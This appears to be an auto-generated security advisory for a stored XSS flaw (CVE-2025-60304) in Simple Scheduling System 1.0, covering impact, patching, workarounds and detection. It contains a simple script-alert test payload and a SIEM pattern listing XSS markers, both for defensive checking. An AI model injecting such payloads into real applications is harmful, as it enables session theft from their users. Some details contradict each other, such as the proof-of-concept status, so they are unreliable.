CVE-2025-60304 – Simple Scheduling System 1.0 contains a stored ... (How to Fix)

Q: What is the severity of CVE-2025-60304?

CVE-2025-60304 has a CVSS score of 6.1 (MEDIUM). Simple Scheduling System 1.0 contains a stored XSS vulnerability in the Subject Description field that allows attackers to inject malicious scripts. When users view scheduled items containing the malicious description, their browsers execute the attacker's code. This affects all users of Simple Scheduling System 1.0 who have access to view scheduled items.

📋 TL;DR

Simple Scheduling System 1.0 contains a stored XSS vulnerability in the Subject Description field that allows attackers to inject malicious scripts. When users view scheduled items containing the malicious description, their browsers execute the attacker's code. This affects all users of Simple Scheduling System 1.0 who have access to view scheduled items.

💻 Affected Systems

Products:

Simple Scheduling System

Versions: 1.0

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: All installations of version 1.0 are vulnerable. The vulnerability exists in the core application code handling the Subject Description field.

📦 What is this software?

Simple Scheduling System by Fabian

View all CVEs affecting Simple Scheduling System →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, redirect users to malicious sites, perform actions on behalf of authenticated users, or install malware through drive-by downloads.

🟠

Likely Case

Attackers will typically steal session cookies to hijack user accounts, potentially gaining administrative access to the scheduling system.

🟢

If Mitigated

With proper input validation and output encoding, the malicious scripts would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH - If the application is exposed to the internet, attackers can easily exploit this vulnerability without network access.

🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could still exploit this, but requires some level of network access.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires the ability to create or modify scheduled items with malicious descriptions. This typically requires some level of access to the application.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1 or later

Vendor Advisory: http://code-projects.com

Restart Required: No

Instructions:

1. Download the latest version from code-projects.com. 2. Backup your current installation. 3. Replace the vulnerable files with the patched version. 4. Verify the fix by testing XSS payloads in the Subject Description field.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize HTML tags and JavaScript from Subject Description field

Implement input sanitization in the PHP code handling Subject Description submissions

Output Encoding

all

Apply proper HTML encoding when displaying Subject Description content

Use htmlspecialchars() or similar functions when outputting Subject Description data

🧯 If You Can't Patch

Implement a web application firewall (WAF) with XSS protection rules
Restrict access to the scheduling system to trusted users only

🔍 How to Verify

Check if Vulnerable:

Test by entering <script>alert('XSS')</script> in the Subject Description field and checking if it executes when viewed

Check Version:

Check the application's version information in the admin panel or about page

Verify Fix Applied:

After patching, test the same XSS payload and verify it displays as plain text rather than executing

📡 Detection & Monitoring

Log Indicators:

Unusual HTML/script patterns in Subject Description field submissions
Multiple failed login attempts following schedule views

Network Indicators:

Outbound connections to suspicious domains from user browsers after viewing schedules

SIEM Query:

search 'Subject Description' AND ('<script>' OR 'javascript:' OR 'onload=' OR 'onerror=')

📊 Metadata

CVE ID: CVE-2025-60304

CVSS v3 Score: 6.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.07% exploit probability (20.8th percentile)

Published: October 9, 2025

Last Updated: October 16, 2025

🔗 References

http://code-projects.com Product
https://github.com/Chen1-Boop/CVE/blob/main/CVE-2025-60304.md Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-60304, you might also want to check these: